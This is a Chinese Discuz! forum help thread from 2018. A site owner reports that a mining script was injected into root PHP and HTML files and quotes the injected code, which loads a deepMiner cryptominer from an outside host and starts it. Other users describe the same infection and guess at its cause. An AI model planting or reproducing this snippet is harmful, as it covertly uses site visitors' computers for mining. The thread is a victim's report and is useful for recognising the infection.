Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

[求助] 3.4肯定有漏洞,老是挂马

[复制链接]
dilinguo 发表于 2018-1-29 14:49:10 | 显示全部楼层 |阅读模式
我被挂的是下面这段代码。主要挂在根目录下的PHP和html文件。。。php加在代码的顶部,html加的底部。主要影响网站速度。


echo "<script src='file:///C:\Users\ADMINI~1\AppData\Local\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttps://greenindex.dynamic-dns.net/jqueryeasyui.js

'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
            if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
            }
        </script>";

 楼主| dilinguo 发表于 2018-1-29 15:10:46 | 显示全部楼层

这个是挖矿的js,,,我一个3.2的dz也在同一个服务器都没有问题,插件都是应用中心下载的。。肯定就出在程序中了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

mahoupao 发表于 2018-1-29 17:04:45 | 显示全部楼层
看看是不是别的地方有木马。一直没找出来,,我之前就是
回复

使用道具 举报

chongzi82 发表于 2018-1-30 09:29:42 | 显示全部楼层
我的论坛程序是discuz x2.5,昨晚也被挂马了,情况和楼主的一模一样!也是根目录下的PHP和html文件被植入挖矿JS,而且植入的代码都是一模一样,看来是近期大面积爆发啊!我的PHP程序版本是5.3,会不会是PHP版本太低产生的漏洞被拿下了呢?楼主的是多少?

暂时还未发现注入点在哪里,哪位大神如果有发现,麻烦指点一下,不胜感激!
回复

使用道具 举报

www.dtcylm.com 发表于 2018-1-30 09:55:09 | 显示全部楼层
我的前几天被挂木马  被劫持   X3.4好像不是很安全
回复

使用道具 举报

湖中沉 发表于 2018-1-30 11:02:35 | 显示全部楼层
和版本根本无关,挂马90%几乎都是服务器权限等漏洞,程序漏洞的反而很少,真的有严重漏洞,早就会有各种安全中心提示DZ并修复了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-30 00:32 , Processed in 0.020906 second(s), 4 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表